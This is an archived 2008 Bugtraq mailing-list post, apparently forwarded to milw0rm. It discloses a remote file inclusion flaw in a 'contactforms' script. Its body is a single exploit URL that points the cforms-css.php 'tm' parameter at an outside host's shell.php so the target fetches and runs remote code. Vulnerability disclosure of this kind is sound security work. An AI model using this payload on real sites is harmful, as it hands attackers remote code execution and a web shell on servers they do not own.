[From nobody Thu Jan 31 15:05:07 2008
X-Account-Key: account2
X-Mozilla-Keys: 
Received: from outgoing.securityfocus.com (outgoing.securityfocus.com
	[205.206.231.27])
	by milw0rm.com (8.14.0/ 1) with ESMTP id m0VEuebE030669
	for <str0ke@milw0rm.com>; Thu, 31 Jan 2008 08:56:40 -0600 (CST)
Received: from outgoing.securityfocus.com by outgoing.securityfocus.com
	via smtpd (for milw0rm.com [76.74.9.18]) with ESMTP;
	Thu, 31 Jan 2008 06:51:18 -0800
Received: from lists2.securityfocus.com (lists2.securityfocus.com
	[205.206.231.20]) by outgoing3.securityfocus.com (Postfix) with QMQP
	id 3886F23768F; Thu, 31 Jan 2008 07:11:54 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 15690 invoked from network); 31 Jan 2008 02:41:12 -0000
Date: 31 Jan 2008 03:14:03 -0000
Message-ID: <20080131031403.3139.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.411 (Entity 5.404)
From: Sw33t.h4cK3r@c13-ss-2-lb.cnet.com, com@securityfocus.com
To: bugtraq@securityfocus.com
Subject: contactforms "cforms-css.php" Remote File Inclusion

Discovery by: Sw33t h4cK3r

-----------

Exploit :

http://Example.com/contactforms/cforms-css.php?tm=http://site.com/shell.php

]